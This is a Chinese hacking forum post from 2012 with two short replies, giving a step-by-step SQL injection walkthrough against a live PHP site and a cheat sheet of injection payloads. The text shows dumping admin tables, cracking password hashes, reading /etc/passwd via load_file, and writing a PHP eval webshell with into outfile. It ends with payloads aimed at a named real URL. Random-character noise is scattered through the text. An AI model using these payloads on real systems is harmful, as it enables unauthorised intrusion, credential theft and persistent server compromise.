找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2704|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
7 H' M- p, Q7 {+ W5 v让我看看,既然人家开口了,我也不好拒绝,那就看看吧?: |+ `# b9 x: k- Y1 n( \
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。9 n9 `+ U4 B8 @; f! _# d
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)& p. @) l/ G6 k: `  o
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)% g: w3 Q, ?$ h; G  I/ v
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
0 j& p+ K( R: M/ P5 FWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in, A! y5 w+ D+ K1 K. O. H3 u3 d
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
/ w( J+ _3 `, l: ?2 Y                         4 ]4 M& d4 z: Y, E# y
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
( t/ \3 x, B3 L3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
3 L: t$ X9 V1 R1 @6 v( e1 w/ T/ g4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
$ s/ |4 S3 G. U" i1 @5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。2 f# r/ A. ~* b+ |
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,: w1 _* v* @9 G/ _/ r- m- y
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。- Z, w* B/ z, R
我就用的是第二个思路,9 ]- B- V& a- ~' o6 h
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
, C3 B! x. r* k5 m3 ]. x6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,- W6 O3 q' j8 p9 y  A, U
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--" H0 e  F% _$ P. R
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。5 `! w* x' X9 o" t
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
4 w& v/ b3 F' u" [& R. @1 G是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....; G' C( H8 K7 S- g: o
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
- U; d* g9 n% g% C; ]* @; q% F  L然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,5 l+ N, i6 I7 ?
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
& f, E' M1 _+ y5 S下面是一些很普遍注入方式资料:3 e& n& f( }9 O. A" l/ J
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='7 k8 w& ^' V% M+ S" {
拆半法
4 `% M  c! [  m. B! ^######################################, [& x2 N' T) x9 p" S0 [5 ]+ o
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。' N: _, u9 l' \( x2 Q* ?" y: j
and exists (select * from admin)1 Q3 {3 g2 p; ~. a. [
and exists(select id from admin)
/ B  V- h- W& |' _5 Y5 K+ [and exists(select id from admin where id=1)
7 C9 f* w  S) y6 _and exists(select id from admin where id>1) 7 J* D' p& H& z0 S
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
: F: O$ |' z7 P1 h2 R- l' t! P2 Y3 vand exists (select username from admin): P7 x7 H: P4 J  p& D
and exists (select password from admin)
8 r" i; A0 r% L' land exists (select id from admin where len(username)<10 and id=1). ~" V* |! c( Y7 U) Y' ?, }
and exists (select id from admin where len(username)>5 and id=1)  U/ B. K$ H% v3 s- U9 V8 s! x* I
and exists (select id from admin where len(username)=6 and id=1)
( N4 R, A- r: |+ k: z1 X( q9 jand exists (select id from admin where len(password)<10 and id=1)
# l7 y3 _0 E7 C! Z! b- _and exists (select id from admin where len(password)>5 and id=1)
  O( B% I+ ]) q2 Y3 a: M# z# ^9 land exists (select id from admin where len(password)=7 and id=1)
& p# {7 [* L$ ?( R8 o9 A7 T) Mand (select top 1 asc(mid(username,1,1)) from admin)=97
5 L% z) S" }: w. G0 u1 X返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
6 o: n/ P4 E, y: o: ~7 ^猜第二位把username,1,1改成username,2,1就可以了。. [1 W, r+ X1 ^3 s+ |
猜密码把username改成password就OK了
8 j8 n' f$ G. Z! g" f##################################################
0 k# W8 E5 U3 Q% i6 t搜索型注入4 b- h3 D3 i4 o8 F4 d) F6 w  G
##################################
% i0 C  U0 ?% a%' and 1=1 and '%'='
, N6 Y- n! q( x% I%' and exists (select * from admin) and '%'='3 [1 P! Y9 w' ?! t$ i. D
%' and exists(select id from admin where id=1) and '%'='' Z3 v8 R9 ^- x* o6 E
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='9 X& u- q7 d& t8 c9 t
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='( L# O, @0 ]2 L2 G
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
/ f* t" V- p6 h9 j这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='8 q1 N# l3 ?5 _) U6 ?/ n8 O
对于MSSQL数据库,后面可以吧 and '%'='换成--
0 N  T: p. m2 w/ A1 `还有一点搜索型注入也可以使用union语句。6 R9 L' Z+ b, e1 ]) R" S
########################################################0 i+ z& ^3 \5 ?0 T; E: q4 Y
联合查询。
) {( w' J% V7 l& y( D: i& S#####################################2 B+ y+ c$ L! `) ~# A5 J
order by 10. e; W4 A' q! p/ i8 c' p
and 1=2 union select 1,2,3,4,5,6,7,8,9,10! c0 l: N' ^, R
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin2 z- `- x  I( |$ N2 Q6 Q8 a
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
1 M2 l7 F5 h/ x5 ~9 C很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)% J  i  a3 w: v- x1 @
###################################
' ]  N: a4 p# h4 b( hcookie注入
+ i# L! j8 p3 e% |. F: }###############################
  O% n/ J# z& e; ]* J9 B) Mhttp://www.******.com/shownews.asp?id=127+ I/ Y0 i1 g% @( l' I$ N
http://www.******.com/shownews.asp9 R+ ?$ n. s9 P  }6 w- y
alert(="id="+escape("127"));
8 Z! x# T8 h& Y: Walert(="id="+escape("127 and 1=1"));) {% J! T9 C; e% _8 D6 h# `" P
alert(="id="+escape("127 order by 10"));+ i# A' a& V' `& h# @- C* P
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));7 E' j2 p3 e$ \% g: M
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));0 t% }: Z7 F! n& V: M1 A" y) k# H
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。& y# {  b5 A% T& I- X9 G* b
###################################
: A/ P0 E# O8 a; f* h  A; }. \# x偏移注入
* n/ d" f4 j) W& Q###########################################################
& B4 T' s& T, iunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
! H" \4 n7 S6 t4 @union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin* N- Y1 t" i- G& k1 {7 }+ |% ]! @
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)7 k! k5 m3 m, w7 X. O
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id): f5 b: Z6 S" X, I9 X: u
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
5 |# Y9 t% f; k2 m2 }8 Sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)  E8 h! A$ \* S/ D- x- j0 }4 m1 e
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
$ D+ R$ i- N& z+ k. O2 ^3 za.id=d.id)
/ s9 B2 H2 L1 z/ p/ [' Uand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
6 }7 A7 c( I) a5 m5 qand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
' E4 g5 Z6 c2 e* O  0 E" R3 D, ?! F' u' W( }
============================================================================================================/ n4 C  u- w% p. S3 _4 G' B9 [8 f
1.判断版本
5 S, A+ M# S; e" B1 jand ord(mid(version(),1,1))>51) c6 i# w4 g6 Z
返回正常,说明大于4.0版本,支持ounion查询( K: H' X* V7 ]1 ^: m  t9 J
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解9 ?: t' C4 N; W1 `4 M8 B
and 2=4 union select 1,2,3,4,5,6,7,8,9--- y. l( M+ J( M' r* Z/ A5 O$ w' p
3.查看数据库版本及当前用户,
( X1 r& L2 z1 V7 ~3 Hand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
$ t( I) }9 f4 V- K- z  p数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
- h- b0 Q& J2 t' u! u1 h4.判断有没有写权限- @, m( `, P* w; h0 m/ C
and (select count(*) from MySQL.user)>0-- 7 _8 d  I; V8 `) M. c) B
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
3 ]6 W5 Q* o! L/ t- Z( u用不了这个命令,就学习土耳其黑客手法,如下
& d# |( \( Y0 _, B* [* W2 n9 Fand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--* r  D' m% [+ t# `0 j0 n+ c0 ]
6.爆表,爆库8 d5 O7 ]6 `! [7 I7 F8 [
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--2 L3 E# c  e6 j7 X4 {  r7 N" T1 f
7.爆列名,爆表) U) m- O, m9 [, v, a# {
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
9 d/ J5 b+ |; T) E" H8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
5 K6 [; w+ A6 u. A+ r5 sand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
, P8 i) x; `5 j! ]; v+ f% K# d4 \3 U1 x9.爆字段内容
3 j; f# \' z( g% ^0 ^, aand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
* E  ~; f6 }7 l( `0 c" Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表